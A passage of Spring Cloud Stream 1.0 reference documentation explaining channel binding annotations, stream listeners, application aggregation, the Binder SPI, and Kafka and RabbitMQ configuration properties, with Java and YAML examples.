as well as how to listen to channels.\n\n=== Declaring and Binding Channels\n\n==== Triggering Binding Via `@EnableBinding`\n\nYou can turn a Spring application into a Spring Cloud Stream application by applying the `@EnableBinding` annotation to one of the application's configuration classes.\nThe `@EnableBinding` annotation itself is meta-annotated with `@Configuration` and triggers the configuration of Spring Cloud Stream infrastructure:\n\n[source,java]\n----\n...\n@Import(...)\n@Configuration\n@EnableIntegration\npublic @interface EnableBinding {\n ...\n Class<?>[] value() default {};\n}\n----\n\nThe `@EnableBinding` annotation can take as parameters one or more interface classes that contain methods which represent bindable components (typically message channels).\n\n[NOTE]\n====\nIn Spring Cloud Stream 1.0, the only supported bindable components are the Spring Messaging `MessageChannel` and its extensions `SubscribableChannel` and `PollableChannel`.\nFuture versions should extend this support to other types of components, using the same mechanism.\nIn this documentation, we will continue to refer to channels.\n====\n\n==== `@Input` and `@Output`\n\nA Spring Cloud Stream application can have an arbitrary number of input and output channels defined in an interface as `@Input` and `@Output` methods:\n\n[source,java]\n----\npublic interface Barista {\n\n @Input\n SubscribableChannel orders();\n\n @Output\n MessageChannel hotDrinks();\n\n @Output\n MessageChannel coldDrinks();\n}\n----\n\nUsing this interface as a parameter to `@EnableBinding` will trigger the creation of three bound channels named `orders`, `hotDrinks`, and `coldDrinks`, respectively.\n\n[source,java]\n----\n@EnableBinding(Barista.class)\npublic class CafeConfiguration {\n\n ...\n}\n----\n\n===== Customizing Channel Names\n\nUsing the `@Input` and `@Output` annotations, you can specify a customized channel name for the channel, as shown in the following example:\n\n[source,java]\n----\npublic interface Barista {\n ...\n @Input(\"inboundOrders\")\n SubscribableChannel orders();\n}\n----\n\nIn this example, the created bound channel will be named `inboundOrders`.\n\n===== `Source`, `Sink`, and `Processor`\n\nFor easy addressing of the most common use cases, which involve either an input channel, an output channel, or both, Spring Cloud Stream provides three predefined interfaces out of the box.\n\n`Source` can be used for an application which has a single outbound channel.\n\n[source,java]\n----\npublic interface Source {\n\n String OUTPUT = \"output\";\n\n @Output(Source.OUTPUT)\n MessageChannel output();\n\n}\n----\n\n`Sink` can be used for an application which has a single inbound channel.\n\n[source,java]\n----\npublic interface Sink {\n\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n\n}\n----\n\n`Processor` can be used for an application which has both an inbound channel and an outbound channel.\n\n[source,java]\n----\npublic interface Processor extends Source, Sink {\n}\n----\n\nSpring Cloud Stream provides no special handling for any of these interfaces; they are only provided out of the box.\n\n==== Accessing Bound Channels\n\n===== Injecting the Bound Interfaces\n\nFor each bound interface, Spring Cloud Stream will generate a bean that implements the interface.\nInvoking a `@Input`-annotated or `@Output`-annotated method of one of these beans will return the relevant bound channel.\n\nThe bean in the following example sends a message on the output channel when its `hello` method is invoked.\nIt invokes `output()` on the injected `Source` bean to retrieve the target channel.\n\n[source,java]\n----\n@Component\npublic class SendingBean {\n\n private Source source;\n\n @Autowired\n public SendingBean(Source source) {\n this.source = source;\n }\n\n public void sayHello(String name) {\n source.output().send(MessageBuilder.withPayload(body).build());\n }\n}\n----\n\n===== Injecting Channels Directly\n\nBound channels can be also injected directly:\n\n[source, java]\n----\n@Component\npublic class SendingBean {\n\n private MessageChannel output;\n\n @Autowired\n public SendingBean(MessageChannel output) {\n this.output = output;\n }\n\n public void sayHello(String name) {\n output.send(MessageBuilder.withPayload(body).build());\n }\n}\n----\n\nIf the name of the channel is customized on the declaring annotation, that name should be used instead of the method name.\nGiven the following declaration:\n\n[source,java]\n----\npublic interface CustomSource {\n ...\n @Output(\"customOutput\")\n MessageChannel output();\n}\n----\n\nThe channel will be injected as shown in the following example:\n\n[source, java]\n----\n@Component\npublic class SendingBean {\n\n @Autowired\n private MessageChannel output;\n\n @Autowired @Qualifier(\"customOutput\")\n public SendingBean(MessageChannel output) {\n this.output = output;\n }\n\n public void sayHello(String name) {\n customOutput.send(MessageBuilder.withPayload(body).build());\n }\n}\n----\n\n==== Producing and Consuming Messages\n\nYou can write a Spring Cloud Stream application using either Spring Integration annotations or Spring Cloud Stream's `@StreamListener` annotation.\nThe `@StreamListener` annotation is modeled after other Spring Messaging annotations (such as `@MessageMapping`, `@JmsListener`, `@RabbitListener`, etc.) but adds content type management and type coercion features.\n\n===== Native Spring Integration Support\n\nBecause Spring Cloud Stream is based on Spring Integration, Stream completely inherits Integration's foundation and infrastructure as well as the component itself.\nFor example, you can attach the output channel of a `Source` to a `MessageSource`:\n\n[source, java]\n----\n@EnableBinding(Source.class)\npublic class TimerSource {\n\n @Value(\"${format}\")\n private String format;\n\n @Bean\n @InboundChannelAdapter(value = Source.OUTPUT, poller = @Poller(fixedDelay = \"${fixedDelay}\", maxMessagesPerPoll = \"1\"))\n public MessageSource<String> timerMessageSource() {\n return () -> new GenericMessage<>(new SimpleDateFormat(format).format(new Date()));\n }\n}\n----\n\nOr you can use a processor's channels in a transformer:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public Object transform(String message) {\n return message.toUpper();\n }\n}\n----\n\n===== Using @StreamListener for Automatic Content Type Handling\n\nComplementary to its Spring Integration support, Spring Cloud Stream provides its own `@StreamListener` annotation, modeled after other Spring Messaging annotations (e.g. `@MessageMapping`, `@JmsListener`, `@RabbitListener`, etc.).\nThe `@StreamListener` annotation provides a simpler model for handling inbound messages, especially when dealing with use cases that involve content type management and type coercion.\n\nSpring Cloud Stream provides an extensible `MessageConverter` mechanism for handling data conversion by bound channels and for, in this case, dispatching to methods annotated with `@StreamListener`.\nThe following is an example of an application which processes external `Vote` events:\n\n[source,java]\n----\n@EnableBinding(Sink.class)\npublic class VoteHandler {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Sink.INPUT)\n public void handle(Vote vote) {\n votingService.record(vote);\n }\n}\n----\n\nThe distinction between `@StreamListener` and a Spring Integration `@ServiceActivator` is seen when considering an inbound `Message` that has a `String` payload and a `contentType` header of `application\/json`.\nIn the case of `@StreamListener`, the `MessageConverter` mechanism will use the `contentType` header to parse the `String` payload into a `Vote` object.\n\nAs with other Spring Messaging methods, method arguments can be annotated with `@Payload`, `@Headers` and `@Header`.\n\n[NOTE]\n====\nFor methods which return data, you must use the `@SendTo` annotation to specify the output binding destination for data returned by the method:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Processor.INPUT)\n @SendTo(Processor.OUTPUT)\n public VoteResult handle(Vote vote) {\n return votingService.record(vote);\n }\n}\n----\n====\n\n[NOTE]\n====\nIn the case of RabbitMQ, content type headers can be set by external applications.\nSpring Cloud Stream supports them as part of an extended internal protocol used for any type of transport (including transports, such as Kafka, that do not normally support headers).\n====\n\n==== Aggregation\n\nSpring Cloud Stream provides support for aggregating multiple applications together, connecting their input and output channels directly and avoiding the additional cost of exchanging messages via a broker.\nAs of version 1.0 of Spring Cloud Stream, aggregation is supported only for the following types of applications:\n\n* _sources_ - applications with a single output channel named `output`, typically having a single binding of the type `org.springframework.cloud.stream.messaging.Source`\n* _sinks_ - applications with a single input channel named `input`, typically having a single binding of the type `org.springframework.cloud.stream.messaging.Sink`\n* _processors_ - applications with a single input channel named `input` and a single output channel named `output`, typically having a single binding of the type `org.springframework.cloud.stream.messaging.Processor`.\n\nThey can be aggregated together by creating a sequence of interconnected applications, in which the output channel of an element in the sequence is connected to the input channel of the next element, if it exists.\nA sequence can start with either a _source_ or a _processor_, it can contain an arbitrary number of _processors_ and must end with either a _processor_ or a _sink_.\n\nDepending on the nature of the starting and ending element, the sequence may have one or more bindable channels, as follows:\n\n* if the sequence starts with a source and ends with a sink, all communication between the applications is direct and no channels will be bound\n* if the sequence starts with a processor, then its input channel will become the `input` channel of the aggregate and will be bound accordingly\n* if the sequence ends with a processor, then its output channel will become the `output` channel of the aggregate and will be bound accordingly\n\nAggregation is performed using the `AggregateApplicationBuilder` utility class, as in the following example.\nLet's consider a project in which we have source, processor and a sink, which may be defined in the project, or may be contained in one of the project's dependencies.\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Sink.class)\npublic class SinkApplication {\n\n\tprivate static Logger logger = LoggerFactory.getLogger(SinkModuleDefinition.class);\n\n\t@ServiceActivator(inputChannel=Sink.INPUT)\n\tpublic void loggerSink(Object payload) {\n\t\tlogger.info(\"Received: \" + payload);\n\t}\n}\n----\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic class ProcessorApplication {\n\n\t@Transformer\n\tpublic String loggerSink(String payload) {\n\t\treturn payload.toUpperCase();\n\t}\n}\n----\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Source.class)\npublic class SourceApplication {\n\n\t@Bean\n\t@InboundChannelAdapter(value = Source.OUTPUT)\n\tpublic String timerMessageSource() {\n\t\treturn new SimpleDateFormat().format(new Date());\n\t}\n}\n----\n\nEach configuration can be used for running a separate component, but in this case they can be aggregated together as follows:\n\n[source,java]\n----\n@SpringBootApplication\npublic class SampleAggregateApplication {\n\n\tpublic static void main(String[] args) {\n\t\tnew AggregateApplicationBuilder()\n\t\t\t.from(SourceApplication.class).args(\"--fixedDelay=5000\")\n\t\t\t.via(ProcessorApplication.class)\n\t\t\t.to(SinkApplication.class).args(\"--debug=true\").run(args);\n\t}\n}\n----\n\nThe starting component of the sequence is provided as argument to the `from()` method.\nThe ending component of the sequence is provided as argument to the `to()` method.\nIntermediate processors are provided as argument to the `via()` method.\nMultiple processors of the same type can be chained together (e.g. for pipelining transformations with different configurations).\nFor each component, the builder can provide runtime arguments for Spring Boot configuration.\n\n\n==== RxJava support\n\nSpring Cloud Stream provides support for RxJava-based processors through the `RxJavaProcessor` available in `spring-cloud-stream-rxjava`.\n\n[source,java]\n----\npublic interface RxJavaProcessor<I, O> {\n\tObservable<O> process(Observable<I> input);\n}\n----\n\nAn implementation of `RxJavaProcessor` will receive `Observable` as an input that represents the flow of inbound message payloads.\nThe `process` method is invoked once at startup for setting up the data flow.\n\nYou can enable the use of RxJava-based processors and use them in your processor application by using the `@EnableRxJavaProcessor` annotation.\n`@EnableRxJavaProcessor` is meta-annotated with `@EnableBinding(Processor.class)` and will create the `Processor` binding.\nHere is an example of an RxJava-based processor:\n\n[source,java]\n----\n@EnableRxJavaProcessor\npublic class RxJavaTransformer {\n\n\tprivate static Logger logger = LoggerFactory.getLogger(RxJavaTransformer.class);\n\n\t@Bean\n\tpublic RxJavaProcessor<String,String> processor() {\n\t\treturn inputStream -> inputStream.map(data -> {\n\t\t\tlogger.info(\"Got data = \" + data);\n\t\t\treturn data;\n\t\t})\n\t\t.buffer(5)\n\t\t.map(data -> String.valueOf(avg(data)));\n\t}\n\n\tprivate static Double avg(List<String> data) {\n\t\tdouble sum = 0;\n\t\tdouble count = 0;\n\t\tfor(String d : data) {\n\t\t\tcount++;\n\t\t\tsum += Double.valueOf(d);\n\t\t}\n\t\treturn sum\/count;\n\t}\n}\n----\n\n\n[NOTE]\n====\nWhen implementing an RxJava processor, it is important to handle exceptions as part of your processing flow.\nUncaught exceptions will be treated as errors by RxJava and will cause the `Observable` to complete, disrupting the flow.\n====\n\n== Binders\n\nSpring Cloud Stream provides a Binder abstraction for use in connecting to physical destinations at the external middleware.\nThis section provides information about the main concepts behind the Binder SPI, its main components, and implementation-specific details.\n\n=== Producers and Consumers\n\n.Producers and Consumers\nimage::producers-consumers.png[width=300,scaledwidth=\"75%\"]\n\nA _producer_ is any component that sends messages to a channel.\nThe channel can be bound to an external message broker via a Binder implementation for that broker.\nWhen invoking the `bindProducer()` method, the first parameter is the name of the destination within the broker, the second parameter is the local channel instance to which the producer will send messages, and the third parameter contains properties (such as a partition key expression) to be used within the adapter that is created for that channel.\n\nA _consumer_ is any component that receives messages from a channel.\nAs with a producer, the consumer's channel can be bound to an external message broker.\nWhen invoking the `bindConsumer()` method, the first parameter is the destination name, and a second parameter provides the name of a logical group of consumers.\nEach group that is represented by consumer bindings for a given destination receives a copy of each message that a producer sends to that destination (i.e., publish-subscribe semantics).\nIf there are multiple consumer instances bound using the same group name, then messages will be load-balanced across those consumer instances so that each message sent by a producer is consumed by only a single consumer instance within each group (i.e., queueing semantics).\n\n=== Binder SPI\n\nThe Binder SPI consists of a number of interfaces, out-of-the box utility classes and discovery strategies that provide a pluggable mechanism for connecting to external middleware.\n\nThe key point of the SPI is the `Binder` interface which is a strategy for connecting inputs and outputs to external middleware.\n\n[source,java]\n----\npublic interface Binder<T, C extends ConsumerProperties, P extends ProducerProperties> {\n\tBinding<T> bindConsumer(String name, String group, T inboundBindTarget, C consumerProperties);\n\n\tBinding<T> bindProducer(String name, T outboundBindTarget, P producerProperties);\n}\n----\n\nThe interface is parameterized, offering a number of extension points:\n\n* input and output bind targets - as of version 1.0, only `MessageChannel` is supported, but this is intended to be used as an extension point in the future;\n* extended consumer and producer properties - allowing specific Binder implementations to add supplemental properties which can be supported in a type-safe manner.\n\nA typical binder implementation consists of the following\n\n* a class that implements the `Binder` interface;\n* a Spring `@Configuration` class that creates a bean of the type above along with the middleware connection infrastructure;\n* a `META-INF\/spring.binders` file found on the classpath containing one or more binder definitions, e.g.\n\n```\nkafka:\\\norg.springframework.cloud.stream.binder.kafka.config.KafkaBinderConfiguration\n```\n\n=== Binder Detection\n\nSpring Cloud Stream relies on implementations of the Binder SPI to perform the task of connecting channels to message brokers.\nEach Binder implementation typically connects to one type of messaging system.\nOut of the box, Spring Cloud Stream provides binders for Kafka, RabbitMQ, and Redis.\n\n==== Classpath Detection\n\nBy default, Spring Cloud Stream relies on Spring Boot's auto-configuration to configure the binding process.\nIf a single Binder implementation is found on the classpath, Spring Cloud Stream will use it automatically.\nFor example, a Spring Cloud Stream project that aims to bind only to RabbitMQ can simply add the following dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-stream-binder-rabbit<\/artifactId>\n<\/dependency>\n----\n\n[[multiple-binders]]\n=== Multiple Binders on the Classpath\n\nWhen multiple binders are present on the classpath, the application must indicate which binder is to be used for each channel binding.\nEach binder configuration contains a `META-INF\/spring.binders`, which is a simple properties file:\n\n[source]\n----\nrabbit:\\\norg.springframework.cloud.stream.binder.rabbit.config.RabbitServiceAutoConfiguration\n----\n\nSimilar files exist for the other provided binder implementations (e.g., Kafka), and custom binder implementations are expected to provide them, as well.\nThe key represents an identifying name for the binder implementation, whereas the value is a comma-separated list of configuration classes that each contain one and only one bean definition of type `org.springframework.cloud.stream.binder.Binder`.\n\nBinder selection can either be performed globally, using the `spring.cloud.stream.defaultBinder` property (e.g., `spring.cloud.stream.defaultBinder=rabbit`) or individually, by configuring the binder on each channel binding.\nFor instance, a processor application which reads from Kafka and writes to RabbitMQ can specify the following configuration:\n\n----\nspring.cloud.stream.bindings.input.binder=kafka\nspring.cloud.stream.bindings.output.binder=rabbit\n----\n\n=== Connecting to Multiple Systems\n\nBy default, binders share the application's Spring Boot auto-configuration, so that one instance of each binder found on the classpath will be created.\nIf your application should connect to more than one broker of the same type, you can specify multiple binder configurations, each with different environment settings.\n\n[NOTE]\n====\nTurning on explicit binder configuration will disable the default binder configuration process altogether.\nIf you do this, all binders in use must be included in the configuration.\n====\n\nFor example, this is the typical configuration for a processor application which connects to two RabbitMQ broker instances:\n\n[source,yml]\n----\nspring:\n cloud:\n stream:\n bindings:\n input:\n destination: foo\n binder: rabbit1\n output:\n destination: bar\n binder: rabbit2\n binders:\n rabbit1:\n type: rabbit\n environment:\n spring:\n rabbitmq:\n host: <host1>\n rabbit2:\n type: rabbit\n environment:\n spring:\n rabbitmq:\n host: <host2>\n----\n\n\n=== Implementation strategies\n\nThis section details the binder implementation strategies for Kafka and Rabbit MQ, in what concerns mapping the Spring Cloud Stream concepts onto the middleware concepts.\n\n==== Kafka Binder\n\n.Kafka Binder\nimage::kafka-binder.png[width=300,scaledwidth=\"50%\"]\n\nThe Kafka Binder implementation maps the destination to a Kafka topic.\nThe consumer group maps directly to the same Kafka concept.\nSpring Cloud Stream does not use the high-level consumer, but implements a similar concept for the simple consumer.\n\n\n==== RabbitMQ Binder\n\n.RabbitMQ Binder\nimage::rabbit-binder.png[width=300,scaledwidth=\"50%\"]\n\nThe RabbitMQ Binder implementation maps the destination to a `TopicExchange`.\nFor each consumer group, a `Queue` will be bound to that `TopicExchange`.\nEach consumer instance that binds will trigger creation of a corresponding RabbitMQ `Consumer` instance for its group's `Queue`.\n\n== Configuration Options\n\nSpring Cloud Stream supports general configuration options as well as configuration for bindings and binders.\nSome binders allow additional binding properties to support middleware-specific features.\n\nConfiguration options can be provided to Spring Cloud Stream applications via any mechanism supported by Spring Boot.\nThis includes application arguments, environment variables, and YAML or .properties files.\n\n=== Spring Cloud Stream Properties\n\nspring.cloud.stream.instanceCount::\n The number of deployed instances of an application.\nMust be set for partitioning and if using Kafka.\n+\nDefault: `1`.\n\nspring.cloud.stream.instanceIndex::\n The instance index of the application: a number from `0` to `instanceCount`-1.\nUsed for partitioning and with Kafka.\nAutomatically set in Cloud Foundry to match the application's instance index.\nspring.cloud.stream.dynamicDestinations::\n A list of destinations that can be bound dynamically (for example, in a dynamic routing scenario).\nIf set, only listed destinations can be bound.\n+\nDefault: empty (allowing any destination to be bound).\n\nspring.cloud.stream.defaultBinder::\n The default binder to use, if multiple binders are configured.\nSee <<multiple-binders,Multiple Binders on the Classpath>>.\n\n[[binding-properties]]\n=== Binding Properties\n\nBinding properties are supplied using the format `spring.cloud.stream.bindings.<channelName>.<property>=<value>`.\nThe `<channelName>` represents the name of the channel being configured (e.g., `output` for a `Source`).\n\nIn what follows, we indicate where we have omitted the `spring.cloud.stream.bindings.<channelName>.` prefix and focus just on the property name, with the understanding that the prefix will be included at runtime.\n\n==== Properties for Use of Spring Cloud Stream\n\nThe following binding properties are available for both input and output bindings and\nmust be prefixed with `spring.cloud.stream.bindings.<channelName>.`.\n\ndestination::\n The target destination of a channel on the bound middleware (e.g., the RabbitMQ exchange or Kafka topic).\n If the channel is bound as a consumer, it could be bound to multiple destinations and the destination names can be specified as comma separated String values.\n If not set, the channel name is used instead.\ngroup::\n The consumer group of the channel.\nApplies only to inbound bindings.\nSee <<consumer-groups,Consumer Groups>>.\n+\nDefault: null (indicating an anonymous consumer).\ncontentType::\n The content type of the channel.\n\/\/See <<content type management>>.\n+\nDefault: null (so that no type coercion is performed).\nbinder::\n The binder used by this binding.\nSee <<multiple-binders>> for details.\n+\nDefault: null (the default binder will be used, if one exists).\n\n==== Consumer properties\n\nThe following binding properties are available for input bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.consumer.`.\n\nconcurrency::\n The concurrency of the inbound consumer.\n+\nDefault: `1`.\npartitioned::\n Whether the consumer receives data from a partitioned producer.\n+\nDefault: `false`.\nheaderMode::\n When set to `raw`, disables header parsing on input.\nEffective only for messaging middleware that does not support message headers natively and requires header embedding.\nUseful when inbound data is coming from outside Spring Cloud Stream applications.\n+\nDefault: `embeddedHeaders`.\nmaxAttempts::\n The number of attempts of re-processing an inbound message.\nCurrently ignored by Kafka.\n+\nDefault: `3`.\nbackOffInitialInterval::\n The backoff initial interval on retry.\nCurrently ignored by Kafka.\n+\nDefault: `1000`.\nbackOffMaxInterval::\n The maximum backoff interval.\nCurrently ignored by Kafka.\n+\nDefault: `10000`.\nbackOffMultiplier::\n The backoff multiplier.\n+\nDefault: `2.0`.\n\n==== Producer Properties\n\nThe following binding properties are available for output bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.producer.`.\n\npartitionKeyExpression::\n A SpEL expression that determines how to partition outbound data.\nIf set, or if `partitionKeyExtractorClass` is set, outbound data on this channel will be partitioned, and `partitionCount` must be set to a value greater than 1 to be effective.\nThe two options are mutually exclusive.\nSee <<partitioning>>.\n+\nDefault: null.\npartitionKeyExtractorClass::\n A `PartitionKeyExtractorStrategy` implementation.\nIf set, or if `partitionKeyExpression` is set, outbound data on this channel will be partitioned, and `partitionCount` must be set to a value greater than 1 to be effective.\nThe two options are mutually exclusive.\nSee <<partitioning>>.\n+\nDefault: null.\npartitionSelectorClass::\n A `PartitionSelectorStrategy` implementation.\nMutually exclusive with `partitionSelectorExpression`.\nIf neither is set, the partition will be selected as the `hashCode(key) % partitionCount`, where `key` is computed via either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: null.\npartitionSelectorExpression::\n A SpEL expression for customizing partition selection.\nMutually exclusive with `partitionSelectorClass`.\nIf neither is set, the partition will be selected as the `hashCode(key) % partitionCount`, where `key` is computed via either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: null.\npartitionCount::\n The number of target partitions for the data, if partitioning is enabled.\nMust be\n set to a value greater than 1 if the producer is partitioned.\nOn Kafka, interpreted as a\n hint; the larger of this and the partition count of the target topic is used instead.\n+\nDefault: `1`.\nrequiredGroups::\n A comma-separated list of groups to which the producer must ensure message delivery even if they start after it has been created (e.g., by pre-creating durable queues in RabbitMQ).\nheaderMode::\n When set to `raw`, disables header embedding on output.\nEffective only for messaging middleware that does not support message headers natively and requires header embedding.\nUseful when producing data for non-Spring Cloud Stream applications.\n+\nDefault: `embeddedHeaders`.\n\n[[binder-specific-configuration]]\n== Binder-Specific Configuration\n\nThe following binder, consumer, and producer properties are specific to binder implementations.\n\n=== Rabbit-Specific Settings\n\n==== RabbitMQ Binder Properties\n\nBy default, the RabbitMQ binder uses Spring Boot's `ConnectionFactory`, and it therefore supports all Spring Boot configuration options for RabbitMQ.\n(For reference, consult the http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#common-application-properties[Spring Boot documentation].) RabbitMQ configuration options use the `spring.rabbitmq` prefix.\n\nIn addition to the Spring Boot options, the RabbitMQ binder supports the following properties:\n\nspring.cloud.stream.rabbit.binder.adminAddresses::\n A comma-separated list of RabbitMQ management plugin URLs.\nOnly used when `nodes` contains more than one entry.\nEach entry in this list must have a corresponding entry in `spring.rabbitmq.addresses`.\n+\nDefault: empty.\nspring.cloud.stream.rabbit.binder.nodes::\n A comma-separated list of RabbitMQ node names.\nWhen more than one entry, used to locate the server address where a queue is located.\nEach entry in this list must have a corresponding entry in `spring.rabbitmq.addresses`.\n+\nDefault: empty.\nspring.cloud.stream.rabbit.binder.compressionLevel::\n Compression level for compressed bindings.\nSee `java.util.zip.Deflater`.\n+\nDefault: `1` (BEST_LEVEL).\n\n==== RabbitMQ Consumer Properties\n\nThe following properties are available for Rabbit consumers only and\nmust be prefixed with `spring.cloud.stream.rabbit.bindings.<channelName>.consumer.`.\n\nacknowledgeMode::\n The acknowledge mode.\n+\nDefault: `AUTO`.\nautoBindDlq::\n Whether to automatically declare the DLQ and bind it to the binder DLX.\n+\nDefault: `false`.\ndurableSubscription::\n Whether subscription should be durable.\nOnly effective if `group` is also set.\n+\nDefault: `true`.\nmaxConcurrency::\n Default: `1`.\nprefetch::\n Prefetch count.\n+\nDefault: `1`.\nprefix::\n A prefix to be added to the name of the `destination` and queues.\n+\nDefault: \"\".\nrequeueRejected::\n Whether delivery failures should be requeued.\n+\nDefault: `true`.\nrequestHeaderPatterns::\n The request headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\nreplyHeaderPatterns::\n The reply headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\nrepublishToDlq::\n By default, messages which fail after retries are exhausted are rejected.\nIf a dead-letter queue (DLQ) is configured, RabbitMQ will route the failed message (unchanged) to the DLQ.\nIf set to `true`, the bus will republish failed messages to the DLQ with additional headers, including the exception message and stack trace from the cause of the final failure.\ntransacted::\n Whether to use transacted channels.\n+\nDefault: `false`.\ntxSize::\n The number of deliveries between acks.\n+\nDefault: `1`.\n\n==== Rabbit Producer Properties\n\nThe following properties are available for Rabbit producers only and\nmust be prefixed with `spring.cloud.stream.rabbit.bindings.<channelName>.producer.`.\n\nautoBindDlq::\n Whether to automatically declare the DLQ and bind it to the binder DLX.\n+\nDefault: `false`.\nbatchingEnabled::\n Whether to enable message batching by producers.\n+\nDefault: `false`.\nbatchSize::\n The number of messages to buffer when batching is enabled.\n+\nDefault: `100`.\nbatchBufferLimit::\n Default: `10000`.\nbatchTimeout::\n Default: `5000`.\ncompress::\n Whether data should be compressed when sent.\n+\nDefault: `false`.\ndeliveryMode::\n Delivery mode.\n+\nDefault: `PERSISTENT`.\nprefix::\n A prefix to be added to the name of the `destination` exchange.\n+\nDefault: \"\".\nrequestHeaderPatterns::\n The request headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\nreplyHeaderPatterns::\n The reply headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\n\n=== Kafka-Specific Settings\n\n==== Kafka Binder Properties\n\nspring.cloud.stream.kafka.binder.brokers::\n A list of brokers to which the Kafka binder will connect.\n+\nDefault: `localhost`.\nspring.cloud.stream.kafka.binder.defaultBrokerPort::\n `brokers` allows hosts specified with or without port information (e.g., `host1,host2:port2`).\nThis sets the default port when no port is configured in the broker list.\n+\nDefault: `9092`.\nspring.cloud.stream.kafka.binder.zkNodes::\n A list of ZooKeeper nodes to which the Kafka binder can connect.\n+\nDefault: `localhost`.\nspring.cloud.stream.kafka.binder.defaultZkPort::\n `zkNodes` allows hosts specified with or without port information (e.g., `host1,host2:port2`).\nThis sets the default port when no port is configured in the node list.\n+\nDefault: `2181`.\nspring.cloud.stream.kafka.binder.headers::\n The list of custom headers that will be transported by the binder.\n+\nDefault: empty.\nspring.cloud.stream.kafka.binder.offsetUpdateTimeWindow::\n The frequency, in milliseconds, with which offsets are saved.\nIgnored if `0`.\n+\nDefault: `10000`.\nspring.cloud.stream.kafka.binder.offsetUpdateCount::\n The frequency, in number of updates, which which consumed offsets are persisted.\nIgnored if `0`.\nMutually exclusive with `offsetUpdateTimeWindow`.\n+\nDefault: `0`.\nspring.cloud.stream.kafka.binder.requiredAcks::\n The number of required acks on the broker.\n+\nDefault: `1`.\nspring.cloud.stream.kafka.binder.minPartitionCount::\n Effective only if `autoCreateTopics` or `autoAddPartitions` is set.\nThe global minimum number of partitions that the binder will configure on topics on which it produces\/consumes data.\nIt can be superseded by the `partitionCount` setting of the producer or by the value of `instanceCount` * `concurrency` settings of the producer (if either is larger).\n+\nDefault: `1`.\nspring.cloud.stream.kafka.binder.replicationFactor::\n The replication factor of auto-created topics if `autoCreateTopics` is active.\n+\nDefault: `1`.\nspring.cloud.stream.kafka.binder.autoCreateTopics::\n If set to `true`, the binder will create new topics automatically.\nIf set to `false`, the binder will rely on the topics being already configured.\nIn the latter case, if the topics do not exist, the binder will fail to start.\nOf note, this setting is independent of the `auto.topic.create.enable` setting of the broker and it does not influence it: if the server is set to auto-create topics, they may be created as part of the metadata retrieval request, with default broker settings.\n+\nDefault: `true`.\nspring.cloud.stream.kafka.binder.autoAddPartitions::\n If set to `true`, the binder will create add new partitions if required.\nIf set to `false`, the binder will rely on the partition size of the topic being already configured.\nIf the partition count of the target topic is smaller than the expected value, the binder will fail to start.\n+\nDefault: `false`.\n\n\n==== Kafka Consumer Properties\n\nThe following properties are available for Kafka consumers only and\nmust be prefixed with `spring.cloud.stream.kafka.bindings.<channelName>.consumer.`.\n\nautoCommitOffset::\n Whether to autocommit offsets when a message has been processed.\nIf set to `false`, an `Acknowledgment` header will be available in the message headers for late acknowledgment.\n+\nDefault: `true`.\nresetOffsets::\n Whether to reset offsets on the consumer to the value provided by `startOffset`.\n+\nDefault: `false`.\nstartOffset::\n The starting offset for new groups, or when `resetOffsets` is `true`.\nAllowed values: `earliest`, `latest`.\n+\nDefault: null (equivalent to `earliest`).\nenableDlq::\n When set to true, it will send enable DLQ behavior for the consumer.\n Messages that result in errors will be forwarded to a topic named `error.<destination>.<group>`.\n This provides an alternative option to the more common Kafka replay scenario for the case when the number of errors is relatively small and replaying the entire original topic may be too cumbersome.\n+\nDefault: `false`.\n\n==== Kafka Producer Properties\n\nThe following properties are available for Kafka producers only and\nmust be prefixed with `spring.cloud.stream.kafka.bindings.<channelName>.producer.`.\n\nbufferSize::\n Upper limit, in bytes, of how much data the Kafka producer will attempt to batch before sending.\n+\nDefault: `16384`.\nsync::\n Whether the producer is synchronous.\n+\nDefault: `false`.\nbatchTimeout::\n How long the producer will wait before sending in order to allow more messages to accumulate in the same batch.\n(Normally the producer does not wait at all, and simply sends all the messages that accumulated while the previous send was in progress.) A non-zero value may increase throughput at the expense of latency.\n+\nDefault: `0`.\n\n[[contenttypemanagement]]\n== Content Type and Transformation\n\nTo allow you to propagate information about the content type of produced messages, Spring Cloud Stream attaches, by default, a `contentType` header to outbound messages.\nFor middleware that does not directly support headers, Spring Cloud Stream provides its own mechanism of automatically wrapping outbound messages in an envelope of its own.\nFor middleware that does support headers, Spring Cloud Stream applications may receive messages with a given content type from non-Spring Cloud Stream applications.\n\nSpring Cloud Stream can handle messages based on this information in two ways:\n\n* Through its `contentType` settings on inbound and outbound channels\n* Through its argument mapping performed for methods annotated with `@StreamListener`\n\nSpring Cloud Stream allows you to declaratively configure type conversion for inputs and outputs using the `content-type` property of a binding.\nNote that general type conversion may also be accomplished easily by using a transformer inside your application.\nCurrently, Spring Cloud Stream natively supports the following type conversions commonly used in streams:\n\n* *JSON* to\/from *POJO*\n* *JSON* to\/from https:\/\/github.com\/spring-projects\/spring-tuple\/blob\/master\/spring-tuple\/src\/main\/java\/org\/springframework\/tuple\/Tuple.java[org.springframework.tuple.Tuple]\n* *Object* to\/from *byte[]* : Either the raw bytes serialized for remote transport, bytes emitted by an application, or converted to bytes using Java serialization(requires the object to be Serializable)\n* *String* to\/from *byte[]*\n* *Object* to *plain text* (invokes the object's _toString()_ 